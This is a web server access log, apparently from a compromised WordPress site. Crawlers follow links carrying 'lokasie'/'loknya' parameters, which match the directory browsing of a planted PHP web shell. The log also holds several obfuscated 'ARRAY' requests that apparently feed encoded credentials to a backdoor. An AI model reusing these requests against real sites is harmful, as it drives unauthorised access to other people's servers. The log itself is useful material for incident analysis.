216.73.216.117 - - [21/Jul/2026:15:43:48 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fauthor-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:43:50 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fregistration-functions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:43:53 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-nav-menu.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:43:53 +0000] "GET /detail/2945069262 HTTP/1.1" 200 32609 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:43:56 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-category-dropdown.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:43:23 +0000] "GET /detail/3596349949 HTTP/1.1" 200 29912 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.32 - - [21/Jul/2026:15:43:27 +0000] "GET /items/B391865662/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
66.249.72.69 - - [21/Jul/2026:15:43:27 +0000] "GET /detail/396978363 HTTP/1.1" 200 31193 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:43:48 +0000] "GET /detail/4337898877 HTTP/1.1" 200 29299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.130.57 - - [21/Jul/2026:15:43:54 +0000] "GET /index.php HTTP/1.1" 404 3166 "https://www.laundrybandung.id/sample-page" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.72.70 - - [21/Jul/2026:15:43:55 +0000] "GET /detail/2647868608?lokasie=/home/vmxfzbqj/public_html/ccs.php&loknya=/home/vmxfzbqj/public_html HTTP/1.1" 200 29626 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:43:57 +0000] "GET /detail/3702779805 HTTP/1.1" 200 29653 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:15:42:00 +0000] "GET /?ARRAY=7o2230223n313738343635323132302p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383532302q3061303830333539643531633164633063623133326636376563373962383032222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:15:44:05 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fsetup-config.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 7704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:44:07 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme-previews.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:44:10 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fdate.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:15:44:00 +0000] "GET /sitemap-9.xml?loknya=/lib64/bind HTTP/2" 404 1729 "https://www.laundrybandung.id/sitemap-9.xml?loknya=/lib64" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
66.249.72.69 - - [21/Jul/2026:15:44:01 +0000] "GET /detail/3725943523?lokasie=/home/vmxfzbqj/public_html/doti.php&loknya=/home/vmxfzbqj/public_html HTTP/1.1" 200 31601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:03 +0000] "GET /detail/6489489324 HTTP/1.1" 200 29438 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:10 +0000] "GET /detail/4329779061 HTTP/1.1" 200 31111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:20 +0000] "GET /detail/4887592962 HTTP/1.1" 200 30653 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:44:21 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-category-dropdown.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:44:23 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-site.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 12103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:44:26 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fpost-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 19275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:44:29 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-roles.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.26 - - [21/Jul/2026:15:44:34 +0000] "GET /items/B396288731/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.117 - - [21/Jul/2026:15:44:34 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-settings.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:44:38 +0000] "GET /compilation/yield/e01by2p2empzyz6.htm HTTP/1.1" 200 30807 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:10 +0000] "GET /detail/2423142995 HTTP/1.1" 200 30499 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:13 +0000] "GET /style/model/empfmqd52adnhnu.htm HTTP/1.1" 200 30822 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:44:13 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-edit.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:44:14 +0000] "GET /detail/2714214161 HTTP/1.1" 200 30525 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:19 +0000] "GET /faction/version/ew29brq9rbqceo7.htm HTTP/1.1" 200 29735 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:15:42:22 +0000] "GET /?ARRAY=7o2230223n313738343635323134322p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383534322q3763343937626639613466396131346562333963316331373561333866623563222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.70 - - [21/Jul/2026:15:44:23 +0000] "GET /detail/6270232865 HTTP/1.1" 200 30315 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:27 +0000] "GET /detail/5268385282 HTTP/1.1" 200 29819 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.75.236.138 - - [21/Jul/2026:15:44:30 +0000] "GET /sitemap-5.xml HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:15:44:30 +0000] "GET /detail/5351456465 HTTP/1.1" 200 29582 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:33 +0000] "GET /matrix/article/fa8dhxwbxmom1a5.htm HTTP/1.1" 200 30641 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:44:36 +0000] "GET /detail/4816293382 HTTP/1.1" 200 31010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:44:39 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftemplate.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 10239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:44:40 +0000] "GET /detail/4951377959 HTTP/1.1" 200 29741 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:44:41 +0000] "GET /detail/6694970146 HTTP/1.1" 200 30026 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:44:42 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcomment.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 5102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:44:44 +0000] "GET /detail/4485650450 HTTP/1.1" 200 30519 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:44:45 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-widget-factory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:44:45 +0000] "GET /label/fragment/e4g2dh48t14enel.htm HTTP/1.1" 200 30577 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:47 +0000] "GET /detail/2887433532 HTTP/1.1" 200 30024 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:51 +0000] "GET /detail/5328511334 HTTP/1.1" 200 29758 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:44:55 +0000] "GET /detail/6759317505 HTTP/1.1" 200 29602 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:44:58 +0000] "GET /detail/6610679245 HTTP/1.1" 200 29358 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.241.56 - - [21/Jul/2026:15:45:00 +0000] "GET /sitemap-9.xml?loknya=/lib64/pdns HTTP/2" 404 2003 "https://www.laundrybandung.id/sitemap-9.xml?loknya=/lib64" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
66.249.72.69 - - [21/Jul/2026:15:45:04 +0000] "GET /detail/2272657706 HTTP/1.1" 200 30417 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:45:08 +0000] "GET /detail/2925386792 HTTP/1.1" 200 29734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:12 +0000] "GET /sitemap-3.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fai-client HTTP/2" 404 2181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:12 +0000] "GET /detail/2095629711 HTTP/1.1" 200 29422 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:14 +0000] "GET /sitemap-6.xml?loknya=%2Fhome%2Fvmxfzbqj%2F.sitepad HTTP/2" 404 1921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:15 +0000] "GET /detail/1688424372?loknya=/home/vmxfzbqj/public_html HTTP/1.1" 200 30027 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:17 +0000] "GET /sitemap-18.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2FIXR HTTP/2" 404 2495 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:45:20 +0000] "GET /sitemap-13.xml?loknya=%2Fhome%2Fvmxfzbqj%2Ftmp HTTP/2" 404 2014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:20 +0000] "GET /detail/5013355260 HTTP/1.1" 200 30597 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:23 +0000] "GET /sitemap-16.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2FIXR HTTP/2" 404 2495 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:23 +0000] "GET /detail/2991485395 HTTP/1.1" 200 29600 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:26 +0000] "GET /sitemap-19.xml?loknya=%2Fhome%2Fvmxfzbqj%2Ftmp HTTP/2" 404 2014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:27 +0000] "GET /detail/6419493474 HTTP/1.1" 200 30250 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:45:32 +0000] "GET /detail/190452745 HTTP/1.1" 200 31319 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:45:33 +0000] "GET /detail/5859916365 HTTP/1.1" 200 29895 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:15:42:44 +0000] "GET /?ARRAY=7o2230223n313738343635323136342p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383536342q3632316464633538386232356666623835613935643335363033383165346164222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
192.250.235.158 - - [21/Jul/2026:15:43:06 +0000] "GET /?ARRAY=7o2230223n313738343635323138362p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383538362q6137363431396333666137643763353862656463303030303461326463346262222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
192.250.235.158 - - [21/Jul/2026:15:43:28 +0000] "GET /?ARRAY=7o2230223n313738343635323230382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383630382q3464343235646137313732383863343537343965623237363362643138303466222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:15:45:28 +0000] "GET /department/component/e0jogk70w47heho.htm HTTP/1.1" 200 31723 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:45:33 +0000] "GET /echelon/possession/e9zk8on8o8n9wl4.htm HTTP/1.1" 200 29734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:45:34 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-text-diff-renderer-table.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:45:36 +0000] "GET /sitemap-3.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fassets HTTP/2" 404 2211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:45:36 +0000] "GET /detail/6887165830 HTTP/1.1" 200 31259 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
